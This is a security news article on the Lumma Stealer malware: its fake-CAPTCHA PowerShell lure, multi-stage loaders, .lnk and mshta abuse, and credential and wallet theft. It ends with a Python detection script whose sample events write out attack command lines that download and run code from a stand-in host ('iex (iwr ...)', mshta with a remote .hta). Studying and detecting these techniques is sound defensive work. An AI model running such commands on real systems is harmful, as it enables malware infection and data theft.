
Lumma Stealer Enhances Capabilities with New PowerShell Tools and Sophisticated Techniques


The Lumma Stealer malware has demonstrated new levels of technical sophistication over the fall and winter of 2024-25, leveraging advanced PowerShell scripting, multi-stage payload delivery, and obfuscation techniques to subvert both user trust and endpoint security measures.

Initially discovered in a late 2024 threat hunt by Sophos Managed Detection and Response (MDR), Lumma Stealer campaigns have been observed employing deceptive fake CAPTCHA websites and malicious downloads to achieve initial infection, followed by a complex sequence of fileless code execution and data exfiltration.

Attack flow with CAPTCHA abuse

A Technical Profile: From MaaS to Mass Infections

Lumma Stealer, active since mid-2022 and attributed to a Russian-speaking developer, operates under a Malware-as-a-Service (MaaS) model, offering regular updates, user support, and distribution channels via Telegram and dedicated online documentation.

The malware’s target set includes credentials, session tokens, cryptocurrency wallets, and sensitive personal data.

Analysts note that the infection cadence of Lumma Stealer has risen sharply in recent months, in part due to advancements in both its delivery and execution chains.

The vector most emblematic of Lumma Stealer’s evolution involves the weaponization of fake CAPTCHA sites.

Victims, lured by offers of software downloads or other social engineering ploys, are presented with plausible verification challenges: CAPTCHA boxes indistinguishable from those seen across legitimate web services.

The poisonous download

Upon passing the fake puzzle, targets are redirected to secondary pages instructing them to execute a PowerShell-encoded command via the Windows Run dialog.

This simple user action triggers a hidden JavaScript routine that copies a sophisticated PowerShell script to the clipboard and executes it in a concealed window.

The script in question retrieves a secondary PowerShell payload from an attacker-controlled server and leverages the Invoke-Expression cmdlet to execute its contents, effectively staging the Lumma Stealer binary for further deployment.

Obfuscated Loaders and Multi-Stage Execution

Analysis of infection chains reveals that the retrieved PowerShell scripts are not merely downloaders; they serve as multi-stage loaders, often fetching an encrypted ZIP archive containing the actual Lumma Stealer executable.

In observed campaigns, this payload is extracted into system folders such as %AppData% and executed under misleading names (e.g., ‘ArtistSponsorship.exe’) to evade user suspicion and basic detection heuristics.

Once operational, Lumma Stealer employs heavily obfuscated AutoIt scripts, shellcode injections, and direct connections to command-and-control (C2) infrastructure.

The malware systematically harvests login credentials, cryptocurrency wallets, session cookies, and browser data, most notably from Chrome, before exfiltrating the entire dataset to external servers via covert channels. The infection process is engineered to terminate itself post-exfiltration, minimizing its residual footprint.

Beyond social engineering with CAPTCHAs, Lumma Stealer actors are deploying disguised .lnk shortcut files masquerading as benign PDFs.

Upon execution, these launch deeply obfuscated PowerShell code through the sftp.exe ProxyCommand feature, which in turn invokes mshta.exe to download and run remote scripts.

The scripts use AES encryption for payload concealment, with decrypted code emerging as portable executable (PE) files that execute additional malware.

Subsequent payload stages resolve critical Windows APIs at runtime, such as GetProcAddress and VirtualProtect, and dynamically download further obfuscated scripts.

These scripts continuously evolve, with code filled with misleading variable names and comments to stymie analysis and bypass static detection mechanisms.

Given Lumma Stealer’s modular approach and the adaptability of its delivery mechanisms, defenders are advised to combine behavioral endpoint protections with targeted user education.

Sophos recommends ongoing monitoring for suspicious PowerShell and process execution chains, careful review of browser histories for evidence of malicious CAPTCHA or verification redirects, and regular analysis of endpoint telemetry for anomalous file operations and C2 communications.
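The execution-chain monitoring recommended here can be expressed as a small hunt over process-creation telemetry for the behaviours the article describes: a hidden-window PowerShell with Invoke-Expression spawned from the Run dialog (explorer.exe), an executable launched from %AppData% by PowerShell, sftp.exe invoked with a ProxyCommand, and mshta.exe fetching a remote script. This is an added example written for this article, not Sophos code; the Sysmon-style events, the process tree, and the `c2.example.invalid` host are all constructed.

```python
"""Hunt constructed process-creation events for the Lumma Stealer chain described above."""
import re

# Constructed sample events (Sysmon-style process creation), not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    # Pasted from the fake CAPTCHA page into the Run dialog: hidden window + IEX download.
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -c \"iex (iwr 'https://c2.example.invalid/s')\""},
    # Payload extracted to %AppData% under a misleading name and run by PowerShell.
    {"pid": 3, "ppid": 2, "image": r"C:\Users\u\AppData\Roaming\ArtistSponsorship.exe",
     "cmd": "ArtistSponsorship.exe"},
    # .lnk variant: sftp.exe ProxyCommand abuse, which then launches mshta.exe.
    {"pid": 4, "ppid": 1, "image": r"C:\Windows\System32\OpenSSH\sftp.exe",
     "cmd": "sftp.exe -o ProxyCommand=\"powershell -c ...\" host"},
    {"pid": 5, "ppid": 4, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://c2.example.invalid/a.hta"},
    # Benign control: should not match anything.
    {"pid": 6, "ppid": 1, "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
]

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden")          # -w hidden / -WindowStyle Hidden
IEX = re.compile(r"\biex\b|invoke-expression")              # Invoke-Expression and its alias
REMOTE = re.compile(r"https?://")


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return (pid, reason) pairs for events matching the described chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name, cmd = _basename(e["image"]), e["cmd"].lower()
        parent = by_pid.get(e["ppid"])
        pname = _basename(parent["image"]) if parent else ""
        if name == "powershell.exe" and pname == "explorer.exe" and HIDDEN.search(cmd) and IEX.search(cmd):
            hits.append((e["pid"], "Run-dialog PowerShell: hidden window with Invoke-Expression"))
        if "\\appdata\\" in e["image"].lower() and pname == "powershell.exe":
            hits.append((e["pid"], "executable launched from %AppData% by PowerShell"))
        if name == "sftp.exe" and "proxycommand" in cmd:
            hits.append((e["pid"], "sftp.exe ProxyCommand abuse"))
        if name == "mshta.exe" and (pname in {"sftp.exe", "powershell.exe"} or REMOTE.search(cmd)):
            hits.append((e["pid"], "mshta.exe running a remote script"))
    return hits


if __name__ == "__main__":
    for pid, reason in hunt(SAMPLE_EVENTS):
        print(pid, reason)
```

Each rule on its own is noisy in a real estate (administrators do run hidden PowerShell); the value is in correlating them along the same process tree as the article's chain.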

The use of fake CAPTCHA sites as a launchpad for fileless attacks represents a particularly insidious innovation, exploiting users’ ingrained trust in web security norms.

As Lumma Stealer’s techniques continue to evolve, organizations must remain vigilant, blending advanced technical controls with renewed scrutiny of seemingly routine user interactions.
